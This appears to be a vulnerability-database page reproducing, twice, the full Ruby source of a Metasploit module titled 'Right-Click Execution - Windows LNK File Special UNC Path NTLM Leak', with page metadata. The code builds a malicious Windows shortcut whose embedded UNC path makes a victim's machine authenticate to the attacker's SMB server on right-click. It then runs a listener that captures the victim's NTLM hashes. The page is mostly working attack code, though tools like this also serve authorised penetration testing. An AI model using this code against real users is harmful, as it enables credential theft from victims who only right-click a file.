Right-Click Execution – Windows LNK File Special UNC Path NTLM...

Description

This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in EnvironmentVariableDataBlock of Shell...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-FILEFORMAT-ENVIRONMENT_VARIABLE_DATABLOCK_LEAK-

Published Oct 1, 2025 at 18:56

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'faker'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::Remote::SMB::Server::HashCapture

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak',
'Description' => %q{
This module creates a malicious Windows shortcut (LNK) file that
specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)
that can trigger an authentication attempt to a remote server. This can be used
to harvest NTLM authentication credentials.

When a victim right-click the generated LNK file, it will attempt to connect to the
the specified UNC path, resulting in an SMB connection that can be captured
to harvest credentials.
},
'License' => MSF_LICENSE,
'Author' => [
'Nafiez', # Original POC & Module
],
'References' => [
['URL', 'https://zeifan.my/Right-Click-LNK/']
],
'Platform' => 'win',
'Targets' => [
['Windows', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2025-05-06',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
'Reliability' => []
}
)
)

register_options([
OptString.new('DESCRIPTION', [false, 'The shortcut description', nil]),
OptString.new('ICON_PATH', [false, 'The icon path to use', nil]),
OptInt.new('PADDING_SIZE', [false, 'Size of padding in command arguments', 10]),
])
end

def run
lnk_data = create_lnk_file
filename = file_create(lnk_data)
print_good("LNK file created: #{filename}")

start_smb_capture_server
print_status("Listening for hashes on #{srvhost}:#{srvport}")

stime = Time.now.to_f
timeout = datastore['ListenerTimeout'].to_i
loop do
break if timeout > 0 && (stime + timeout < Time.now.to_f)

Rex::ThreadSafe.sleep(1)
end
end

def create_lnk_file
data = ''.b

# LNK header - 76 bytes
header = "\x4C\x00\x00\x00".b

# LinkCLSID (00021401-0000-0000-C000-000000000046)
header += "\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46".b

# Define LinkFlags
link_flags = 0x00000000
link_flags |= 0x00000004 # HAS_NAME
link_flags |= 0x00000020 # HAS_ARGUMENTS
link_flags |= 0x00000040 # HAS_ICON_LOCATION
link_flags |= 0x00000080 # IS_UNICODE
link_flags |= 0x00000200 # HAS_EXP_STRING

header += [link_flags].pack('V')

# FileAttributes (FILE_ATTRIBUTE_NORMAL)
header += "\x20\x00\x00\x00".b

# CreationTime, AccessTime, WriteTime (zeroed)
header += ("\x00\x00\x00\x00\x00\x00\x00\x00".b) * 3

# FileSize
header += "\x00\x00\x00\x00".b

# IconIndex
header += "\x00\x00\x00\x00".b

# ShowCommand (SW_SHOWNORMAL)
header += "\x01\x00\x00\x00".b

# HotKey
header += "\x00\x00".b

# Reserved fields
header += "\x00\x00".b + "\x00\x00\x00\x00".b + "\x00\x00\x00\x00".b

# Add the header to our binary data
data += header

# NAME field (description in Unicode)
description = datastore['DESCRIPTION'] || Faker::Lorem.sentence(word_count: 3)
description_utf16 = description.encode('UTF-16LE').b
data += [description_utf16.bytesize / 2].pack('v')
data += description_utf16

# ARGUMENTS field (command line arguments in Unicode)
padding_size = datastore['PADDING_SIZE']
cmd_args = ' ' * padding_size
cmd_args_utf16 = cmd_args.encode('UTF-16LE').b
data += [cmd_args_utf16.bytesize / 2].pack('v')
data += cmd_args_utf16

# ICON LOCATION field (icon path in Unicode)
icon_path = datastore['ICON_PATH'] || 'e.g. abc.ico'
icon_path_utf16 = icon_path.encode('UTF-16LE').b
data += [icon_path_utf16.bytesize / 2].pack('v')
data += icon_path_utf16

# ExtraData section - ICON ENVIRONMENT DATABLOCK SIGNATURE
env_block_size = 0x00000314 # Total size of this block
env_block_sig = 0xA0000001 # Environmental Variables block signature

data += [env_block_size].pack('V')
data += [env_block_sig].pack('V')

# Target field in ANSI (260 bytes)
unc_share = datastore['SHARE']
unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?
unc_path = "\\\\#{srvhost}\\#{unc_share}"

# Create fixed-size ANSI buffer with nulls
ansi_buffer = "\x00".b * 260

# Copy the UNC path bytes into the buffer
unc_path.bytes.each_with_index do |byte, i|
ansi_buffer.setbyte(i, byte) if i < ansi_buffer.bytesize
end

data += ansi_buffer

# Target field in Unicode (520 bytes)
unc_path_utf16 = unc_path.encode('UTF-16LE').b

# Create fixed-size Unicode buffer with nulls
unicode_buffer = "\x00".b * 520

# Copy the UTF-16LE encoded UNC path bytes into the buffer
unc_path_utf16.bytes.each_with_index do |byte, i|
unicode_buffer.setbyte(i, byte) if i < unicode_buffer.bytesize
end

data += unicode_buffer

data += "\x00\x00\x00\x00".b

data
end

def get_unc_path
"\\\\#{srvhost}\\#{Rex::Text.rand_text_alphanumeric(6)}"
end

def start_smb_capture_server
start_service
print_status('The SMB service has been started.')
end

end

{
    "lastseen": "2025-10-01T21:38:33",
    "description": "This module creates a malicious Windows shortcut (LNK) file that           specifies a special UNC path in EnvironmentVariableDataBlock of Shell...",
    "published": "2025-10-01T18:56:05",
    "modified": "2025-10-01T18:56:05",
    "type": "metasploit",
    "title": "Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-FILEFORMAT-ENVIRONMENT_VARIABLE_DATABLOCK_LEAK-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'faker'\n\nclass MetasploitModule < Msf::Auxiliary\n\n  include Msf::Exploit::FILEFORMAT\n  include Msf::Exploit::Remote::SMB::Server::Share\n  include Msf::Exploit::Remote::SMB::Server::HashCapture\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak',\n        'Description' => %q{\n          This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim right-click the generated LNK file, it will attempt to connect to the\n          the specified UNC path, resulting in an SMB connection that can be captured\n          to harvest credentials.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'Nafiez', # Original POC & Module\n        ],\n        'References' => [\n          ['URL', 'https://zeifan.my/Right-Click-LNK/']\n        ],\n        'Platform' => 'win',\n        'Targets' => [\n          ['Windows', {}]\n        ],\n        'DefaultTarget' => 0,\n        'DisclosureDate' => '2025-05-06',\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],\n          'Reliability' => []\n        }\n      )\n    )\n\n    register_options([\n      OptString.new('DESCRIPTION', [false, 'The shortcut description', nil]),\n      OptString.new('ICON_PATH', [false, 'The icon path to use', nil]),\n      OptInt.new('PADDING_SIZE', [false, 'Size of padding in command arguments', 10]),\n    ])\n  end\n\n  def run\n    lnk_data = create_lnk_file\n    filename = file_create(lnk_data)\n    print_good(\"LNK file created: #{filename}\")\n\n    start_smb_capture_server\n    print_status(\"Listening for hashes on #{srvhost}:#{srvport}\")\n\n    stime = Time.now.to_f\n    timeout = datastore['ListenerTimeout'].to_i\n    loop do\n      break if timeout > 0 && (stime + timeout < Time.now.to_f)\n\n      Rex::ThreadSafe.sleep(1)\n    end\n  end\n\n  def create_lnk_file\n    data = ''.b\n\n    # LNK header - 76 bytes\n    header = \"\\x4C\\x00\\x00\\x00\".b\n\n    # LinkCLSID (00021401-0000-0000-C000-000000000046)\n    header += \"\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xC0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\".b\n\n    # Define LinkFlags\n    link_flags = 0x00000000\n    link_flags |= 0x00000004  # HAS_NAME\n    link_flags |= 0x00000020  # HAS_ARGUMENTS\n    link_flags |= 0x00000040  # HAS_ICON_LOCATION\n    link_flags |= 0x00000080  # IS_UNICODE\n    link_flags |= 0x00000200  # HAS_EXP_STRING\n\n    header += [link_flags].pack('V')\n\n    # FileAttributes (FILE_ATTRIBUTE_NORMAL)\n    header += \"\\x20\\x00\\x00\\x00\".b\n\n    # CreationTime, AccessTime, WriteTime (zeroed)\n    header += (\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\".b) * 3\n\n    # FileSize\n    header += \"\\x00\\x00\\x00\\x00\".b\n\n    # IconIndex\n    header += \"\\x00\\x00\\x00\\x00\".b\n\n    # ShowCommand (SW_SHOWNORMAL)\n    header += \"\\x01\\x00\\x00\\x00\".b\n\n    # HotKey\n    header += \"\\x00\\x00\".b\n\n    # Reserved fields\n    header += \"\\x00\\x00\".b + \"\\x00\\x00\\x00\\x00\".b + \"\\x00\\x00\\x00\\x00\".b\n\n    # Add the header to our binary data\n    data += header\n\n    # NAME field (description in Unicode)\n    description = datastore['DESCRIPTION'] || Faker::Lorem.sentence(word_count: 3)\n    description_utf16 = description.encode('UTF-16LE').b\n    data += [description_utf16.bytesize / 2].pack('v')\n    data += description_utf16\n\n    # ARGUMENTS field (command line arguments in Unicode)\n    padding_size = datastore['PADDING_SIZE']\n    cmd_args = ' ' * padding_size\n    cmd_args_utf16 = cmd_args.encode('UTF-16LE').b\n    data += [cmd_args_utf16.bytesize / 2].pack('v')\n    data += cmd_args_utf16\n\n    # ICON LOCATION field (icon path in Unicode)\n    icon_path = datastore['ICON_PATH'] || 'e.g. abc.ico'\n    icon_path_utf16 = icon_path.encode('UTF-16LE').b\n    data += [icon_path_utf16.bytesize / 2].pack('v')\n    data += icon_path_utf16\n\n    # ExtraData section - ICON ENVIRONMENT DATABLOCK SIGNATURE\n    env_block_size = 0x00000314  # Total size of this block\n    env_block_sig = 0xA0000001   # Environmental Variables block signature\n\n    data += [env_block_size].pack('V')\n    data += [env_block_sig].pack('V')\n\n    # Target field in ANSI (260 bytes)\n    unc_share = datastore['SHARE']\n    unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?\n    unc_path = \"\\\\\\\\#{srvhost}\\\\#{unc_share}\"\n\n    # Create fixed-size ANSI buffer with nulls\n    ansi_buffer = \"\\x00\".b * 260\n\n    # Copy the UNC path bytes into the buffer\n    unc_path.bytes.each_with_index do |byte, i|\n      ansi_buffer.setbyte(i, byte) if i < ansi_buffer.bytesize\n    end\n\n    data += ansi_buffer\n\n    # Target field in Unicode (520 bytes)\n    unc_path_utf16 = unc_path.encode('UTF-16LE').b\n\n    # Create fixed-size Unicode buffer with nulls\n    unicode_buffer = \"\\x00\".b * 520\n\n    # Copy the UTF-16LE encoded UNC path bytes into the buffer\n    unc_path_utf16.bytes.each_with_index do |byte, i|\n      unicode_buffer.setbyte(i, byte) if i < unicode_buffer.bytesize\n    end\n\n    data += unicode_buffer\n\n    data += \"\\x00\\x00\\x00\\x00\".b\n\n    data\n  end\n\n  def get_unc_path\n    \"\\\\\\\\#{srvhost}\\\\#{Rex::Text.rand_text_alphanumeric(6)}\"\n  end\n\n  def start_smb_capture_server\n    start_service\n    print_status('The SMB service has been started.')\n  end\n\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/fileformat/environment_variable_datablock_leak/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Right-Click Execution – Windows LNK File Special UNC Path NTLM Leak_MSF:AUXILIARY-FILEFORMAT-ENVIRONMENT_VARIABLE_DATABLOCK_LEAK-

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply